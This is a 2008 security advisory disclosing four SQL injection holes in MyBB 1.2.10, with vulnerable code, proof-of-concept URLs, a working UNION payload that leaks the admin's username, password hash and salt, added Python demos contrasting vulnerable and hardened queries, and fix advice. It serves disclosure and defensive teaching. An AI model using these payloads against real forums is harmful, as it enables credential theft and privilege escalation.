
[waraxe-2008-SA#062] - Multiple SQL Injections in MyBB 1.2.10
================================================================================

Author: Janek Vind "waraxe"
Date: 16. January 2008
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-62.html


Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MyBB is a discussion board that has been around for a while; it has evolved
from other bulletin boards into the forum package it is today. Therefore,
it is a professional and efficient discussion board, developed by an active
team of developers.

Vulnerabilities discovered
================================================================================

1. SQL Injection in "moderation.php" action "do_mergeposts"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Precondition: attacker must have moderator privileges in the target MyBB
installation, including "canmanagethreads".

From the source code of "moderation.php", line ~438:

-------------------------------------------------------------------------------
// Lets merge those selected posts!
case "do_mergeposts":
    if(is_moderator($fid, "canmanagethreads") != "yes")
    {
        error_no_permission();
    }
    $plugins->run_hooks("moderation_do_mergeposts");
    // Raw request array; neither its keys nor its values are validated
    $mergepost = $mybb->input['mergepost'];
    if(count($mergepost) <= 1)
    {
        error($lang->error_nomergeposts);
    }

    // The array KEYS (the parameter names) become the post ID list
    foreach($mergepost as $pid => $yes)
    {
        $plist[] = $pid;
    }

    $moderation->merge_posts($plist, $tid, $mybb->input['sep']);
-------------------------------------------------------------------------------

As seen above, the unsanitized array variable 'mergepost' from GPC input is
delivered to the function "merge_posts()" as its first argument, "$plist".
Note that it is the array keys, not the values, that are collected, so the
attacker controls the ID list through the parameter names themselves.

Source code of "merge_posts":
-------------------------------------------------------------------------------
function merge_posts($pids, $tid, $sep="new_line")
{
    global $db, $plugins;

    // Elements are joined verbatim; nothing forces them to be integers
    $pidin = implode(",", $pids);
    $first = 1;
    // Get the messages to be merged
    $query = $db->query("
        SELECT p.pid, p.uid, p.fid, p.tid, p.visible, p.message, f.usepostcounts
        FROM ".TABLE_PREFIX."posts p
        LEFT JOIN ".TABLE_PREFIX."forums f ON (f.fid=p.fid)
        WHERE p.tid='$tid' AND p.pid IN($pidin)
        ORDER BY dateline ASC
    ");
-------------------------------------------------------------------------------

It is obvious that the "$pids" argument is used in the SQL query without any
sanitization. Because it lands inside an unquoted IN(...) list, escaping
quotes would not help either; each element would have to be cast to an
integer. So an SQL injection hole exists here.

Let's try this proof-of-concept test:

http://localhost/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts
&mergepost[war]=1&mergepost[axe]=2

... and we can see the SQL error message:

MySQL error: 1054
Unknown column 'war' in 'where clause'
Query: SELECT p.pid, p.uid, p.fid, p.tid, p.visible, p.message, f.usepostcounts
FROM mybb_posts p LEFT JOIN mybb_forums f ON (f.fid=p.fid)
WHERE p.tid='0' AND p.pid IN(war,axe) ORDER BY dateline ASC

Yes, indeed, the SQL injection exists, and as a bonus the error message gives
away an additional piece of information useful for further injection: the
table prefix. It can differ from the default "mybb_", and without knowing it
we would have trouble fetching data from MyBB tables.

This was a proof-of-concept test; how about a real attack example?
Here it is:

http://localhost/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts
&mergepost[-1]=1&mergepost[-2)UNION+ALL+SELECT+1,2,3,4,1,6,7+UNION+ALL+SELECT+1,
(SELECT+CONCAT(0x5e,username,0x5e,password,0x5e,salt,0x5e,0x27)
+FROM+mybb_users+LIMIT+0,1),3,4,1,6,7/*]=2

The post IDs -1 and -2 match nothing, so the only rows the SELECT returns are
the two injected ones. The second of them carries the first user row's
username, password hash and salt in its uid column, terminated by 0x27 (a
single quote). merge_posts() then interpolates that uid into the UPDATE that
adjusts post counts, the stray quote breaks the statement, and the error page
echoes the data back:

MySQL error: 1064
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near ... line 1
Query: UPDATE mybb_users SET postnum=postnum-1
WHERE uid='^waraxe^aff3fcfc70d2a50c3d4c2158233c3901^C5ybEW6b^''

Yeah - the admin's username, password hash and salt, all in one line!

Now the mitigating factors. First of all, the attacker must have moderator
privileges, including "canmanagethreads". So this SQL injection hole can be
used for privilege escalation from moderator to admin, provided the admin's
password is weak enough to be cracked with reasonable processing power and
time (the salt leaks along with the hash, so offline cracking is possible,
but each account has to be attacked separately).

Error feedback: if the attacker can't see SQL error messages, that will not
stop the attack; it will just be harder to exploit and require blind SQL
injection methods.


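To make the mechanics above concrete, here is an added example (my own Python model, not MyBB code) of the merge_posts() SELECT and the follow-up post count UPDATE, run against an in-memory SQLite database with constructed tables and rows. It builds the query the vulnerable way (implode of the raw array keys) and the hardened way (each element passed through an intval()-style cast, the usual fix for an unquoted ID list) and replays the page's mergepost[] request. The MySQL-specific CONCAT() and 0x.. literals are rewritten with || and char() because SQLite has neither; the table contents, the 'admin' row, the php_intval helper and the exact shape of the UPDATE loop are assumptions for the demo.

```python
"""Model of the MyBB 1.2.10 merge_posts() injection.

Added example, not MyBB code. Tables and rows are constructed so the script
runs offline against SQLite; the page's MySQL CONCAT()/0x.. payload is
rewritten with || and char(94) ('^') / char(39) (single quote).
"""
import re
import sqlite3

TABLE_PREFIX = "mybb_"

# Constructed sample data: one admin, one forum that counts posts, two posts.
SCHEMA = f"""
CREATE TABLE {TABLE_PREFIX}users (uid INTEGER, username TEXT, password TEXT,
                                  salt TEXT, postnum INTEGER);
CREATE TABLE {TABLE_PREFIX}forums (fid INTEGER, usepostcounts INTEGER);
CREATE TABLE {TABLE_PREFIX}posts (pid INTEGER, uid INTEGER, fid INTEGER, tid INTEGER,
                                  visible INTEGER, message TEXT, dateline INTEGER);
INSERT INTO {TABLE_PREFIX}users VALUES (1, 'admin', 'constructedhash0000', 'saltsalt', 2);
INSERT INTO {TABLE_PREFIX}forums VALUES (2, 1);
INSERT INTO {TABLE_PREFIX}posts VALUES (10, 1, 2, 7, 1, 'first', 1000);
INSERT INTO {TABLE_PREFIX}posts VALUES (11, 1, 2, 7, 1, 'second', 1001);
"""


def php_intval(value):
    """PHP intval() on a string: the leading integer, or 0 if there is none."""
    m = re.match(r"\s*[+-]?\d+", str(value))
    return int(m.group()) if m else 0


def select_query(pids, tid, harden=False):
    """The SELECT from merge_posts(). harden=False pastes the elements in
    verbatim, like implode(",", $pids); harden=True casts each one first."""
    if harden:
        pids = [php_intval(p) for p in pids]
        tid = php_intval(tid)
    pidin = ",".join(str(p) for p in pids)
    return (
        "SELECT p.pid, p.uid, p.fid, p.tid, p.visible, p.message, f.usepostcounts "
        f"FROM {TABLE_PREFIX}posts p LEFT JOIN {TABLE_PREFIX}forums f ON (f.fid=p.fid) "
        f"WHERE p.tid='{tid}' AND p.pid IN({pidin}) ORDER BY dateline ASC"
    )


def merge_posts(mergepost, tid, harden=False):
    """Replay do_mergeposts against a fresh database.

    Returns the uid column of the SELECT result and the error text (error plus
    failed query, as MyBB's error page prints it) of any post count UPDATE that
    broke. The loop mirrors the $first flag: row 0 is the surviving post, every
    later row is merged away and its author's post count is decremented.
    """
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    pids = list(mergepost.keys())  # foreach($mergepost as $pid => $yes) $plist[] = $pid;
    rows = db.execute(select_query(pids, tid, harden)).fetchall()
    errors = []
    for _pid, uid, _fid, _tid, _visible, _message, usepostcounts in rows[1:]:
        if usepostcounts:
            # Assumption matching the error on the page: the uid from the result
            # row is interpolated straight into the UPDATE.
            sql = f"UPDATE {TABLE_PREFIX}users SET postnum=postnum-1 WHERE uid='{uid}'"
            try:
                db.execute(sql)
            except sqlite3.OperationalError as exc:
                errors.append(f"{exc}\nQuery: {sql}")
    return [str(r[1]) for r in rows], errors


# The page's attack request, with the MySQL functions rewritten for SQLite.
LEAK_KEY = (
    "-2)UNION ALL SELECT 1,2,3,4,1,6,7 UNION ALL SELECT 1,"
    "(SELECT char(94)||username||char(94)||password||char(94)||salt||char(94)||char(39) "
    f"FROM {TABLE_PREFIX}users LIMIT 1),3,4,1,6,7/*"
)
ATTACK = {"-1": "1", LEAK_KEY: "2"}  # mergepost[-1]=1&mergepost[<payload>]=2
LEGIT = {"10": "1", "11": "1"}       # a moderator really merging posts 10 and 11

if __name__ == "__main__":
    uids, errors = merge_posts(ATTACK, tid=0)
    print("vulnerable, uid column:", uids)
    print("vulnerable, UPDATE error:", errors)
    print("hardened:", merge_posts(ATTACK, tid=0, harden=True))
    print("legit merge:", merge_posts(LEGIT, tid=7, harden=True))
```

Run it and the vulnerable path shows the '^admin^hash^salt^'' string arriving in the uid column and then surfacing in the broken UPDATE, exactly the shape of the error page above; the hardened path turns the whole payload key into -2 and returns nothing, while a genuine merge still works.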
2. SQL Injection in "moderation.php" action "allreports"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Precondition: attacker must have moderator privileges in the target MyBB
installation (note that is_moderator() is called here without a forum ID).

Let's try:

http://localhost/mybb.1.2.10/moderation.php?fid=2&action=allreports&rid=0'
+UNION+SELECT+waraxe--+

And we see the error message:

MySQL error: 1054
Unknown column 'waraxe' in 'field list'
Query: SELECT COUNT(rid) AS count FROM mybb_reportedposts WHERE
rid <= '0' UNION SELECT waraxe-- '

Problematic code:

case "allreports":
    if(is_moderator() != "yes")
    {
        error_no_permission();
    }
    ...
    if($mybb->input['rid'])
    {
        // 'rid' is concatenated into the WHERE clause; simple_select()
        // passes that string to the database as-is
        $query = $db->simple_select(TABLE_PREFIX."reportedposts",
            "COUNT(rid) AS count", "rid <= '".$mybb->input['rid']."'");

Here the value sits inside single quotes, so the payload first closes the
quote (the 0') and then comments out the trailing one with "-- ". As in the
previous case, this SQL injection can ultimately lead to privilege escalation
from moderator level to admin level.


3. SQL Injection in "moderation.php" action "do_multimovethreads"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Precondition: attacker must have moderator privileges in the target MyBB
installation, including "canmanagethreads".

Let's issue this request:

http://localhost/mybb.1.2.10/moderation.php?fid=2&action=do_multimovethreads
&moveto=2&threads=war|axe

Error message:

MySQL error: 1054
Unknown column 'war' in 'where clause'
Query: SELECT fid, visible, replies, unapprovedposts FROM mybb_threads
WHERE tid IN (war,axe)

Flawed piece of code:

case "do_multimovethreads":
    if(is_moderator($fid, "canmanagethreads") != "yes")
    {
        error_no_permission();
    }
    // 'moveto' is cast with intval() ...
    $moveto = intval($mybb->input['moveto']);
    // ... but the pipe-separated 'threads' list is split and used as-is
    $threadlist = explode("|", $mybb->input['threads']);
    foreach($threadlist as $tid)
    {
        $tids[] = $tid;
    }
    ...
    $moderation->move_threads($tids, $moveto);

Note the contrast: 'moveto' is cast with intval() right there, while the
thread IDs from the same request are not, and they end up in an unquoted
IN (...) list. Similarly to the previous two cases, this SQL injection can
lead to privilege escalation from moderator level to admin level within the
MyBB context.


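Cases 2 and 3 differ in one way worth noticing: in "allreports" the value sits inside single quotes, in "do_multimovethreads" it does not. The added Python example below (my own, not MyBB code) models both queries against an in-memory SQLite database with constructed tables and shows that quote escaping closes the quoted hole but leaves the unquoted IN (...) list fully injectable, whereas an intval()-style cast closes both. Escaping is done by SQL-standard quote doubling, since SQLite does not treat backslashes as escapes the way MySQL does; table names, rows and the two payloads are assumptions for the demo. The same pair of contexts recurs in the admin/usergroups.php case below (request[] keys unquoted, gid quoted).

```python
"""Quoted versus unquoted injection context in the allreports and
do_multimovethreads queries.

Added example, not MyBB code. Tables and rows are constructed so the script
runs offline against SQLite. Escaping uses SQL-standard quote doubling because
SQLite does not treat backslashes as escapes (MySQL's escaping differs in
syntax, not in what it can and cannot protect).
"""
import re
import sqlite3

# Constructed sample data: three reported posts and two threads in forum 2.
SCHEMA = """
CREATE TABLE mybb_reportedposts (rid INTEGER, pid INTEGER);
CREATE TABLE mybb_threads (tid INTEGER, fid INTEGER, visible INTEGER,
                           replies INTEGER, unapprovedposts INTEGER);
INSERT INTO mybb_reportedposts VALUES (1, 100), (2, 101), (3, 102);
INSERT INTO mybb_threads VALUES (5, 2, 1, 3, 0), (6, 2, 1, 0, 1);
"""


def php_intval(value):
    """PHP intval() on a string: the leading integer, or 0 if there is none."""
    m = re.match(r"\s*[+-]?\d+", str(value))
    return int(m.group()) if m else 0


def escape(value):
    """Quote escaping only: makes a value safe INSIDE a quoted literal."""
    return str(value).replace("'", "''")


def run(sql):
    """Execute one statement against a fresh copy of the sample database."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db.execute(sql).fetchall()


def allreports_count(rid, fix=None):
    """simple_select(..., "rid <= '".$rid."'"): the value sits inside quotes,
    so the attacker must break out with a quote, and escaping is enough."""
    if fix == "escape":
        rid = escape(rid)
    elif fix == "intval":
        rid = php_intval(rid)
    return run(f"SELECT COUNT(rid) AS count FROM mybb_reportedposts WHERE rid <= '{rid}'")


def multimove_threads(threads, fix=None):
    """explode("|", $threads) joined into IN (...): no quotes to break out of,
    so escaping changes nothing; only a cast closes the hole."""
    tids = threads.split("|")
    if fix == "escape":
        tids = [escape(t) for t in tids]
    elif fix == "intval":
        tids = [str(php_intval(t)) for t in tids]
    return run("SELECT fid, visible, replies, unapprovedposts FROM mybb_threads "
               f"WHERE tid IN ({','.join(tids)})")


# Constructed payloads in the shape of the page's requests, each pulling rows
# from a table the original query never touches.
RID_PAYLOAD = "0' UNION SELECT tid FROM mybb_threads-- "
THREADS_PAYLOAD = "-1) UNION SELECT rid, pid, 0, 0 FROM mybb_reportedposts-- "

if __name__ == "__main__":
    for fix in (None, "escape", "intval"):
        print(f"allreports fix={fix!s:7}", allreports_count(RID_PAYLOAD, fix))
        print(f"multimove  fix={fix!s:7}", multimove_threads(THREADS_PAYLOAD, fix))
```

With no fix, both payloads return rows from the other table. With escaping, the rid payload collapses into one harmless literal but the threads payload still leaks everything, because there was never a quote to escape; the cast stops both, and a genuine request such as threads=5|6 still works.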
4. SQL Injection in "admin/usergroups.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Precondition: attacker must have admin privileges in the MyBB context, so the
risk level is low. Still, any non-superadmin admin can use it to fetch any
data from the database, including the password hashes of other admins.

http://localhost/mybb.1.2.10/admin/usergroups.php?
adminsid=f962d4e991671f3f930d7117a745147f
&action=do_joinrequests
&request[waraxe]=decline

(adminsid is the admin session identifier of the test installation and will
differ elsewhere.)

Error:

MySQL error: 1054
Unknown column 'waraxe' in 'where clause'
Query: DELETE FROM mybb_joinrequests WHERE uid IN(waraxe) AND gid=''

http://localhost/mybb.1.2.10/admin/usergroups.php?
adminsid=f962d4e991671f3f930d7117a745147f
&action=do_joinrequests
&request[-1]=decline
&gid='waraxe

Error:

MySQL error: 1064
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near 'waraxe'' at line 1
Query: DELETE FROM mybb_joinrequests WHERE uid IN(-1) AND gid=''waraxe'

Reason: the incoming variables "request" (its array keys, as in case 1) and
"gid" are not sanitized before being used in SQL queries; the first lands in
an unquoted IN(...) list, the second inside quotes.


How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Upgrade to MyBB 1.2.11 as soon as possible! In code, the pattern is the same
in all four cases: every ID that reaches a query should be cast with intval()
(escaping alone does nothing inside an unquoted IN(...) list), and every
string value should be escaped before it is placed inside quotes.

Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb
and anyone else who knows me!
Greetings to Raido Kerna. Tervitusi Torufoorumi rahvale!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.janekvind.com/
Waraxe forum: http://www.waraxe.us/forums.html

---------------------------------- [ EOF ] --------------------------------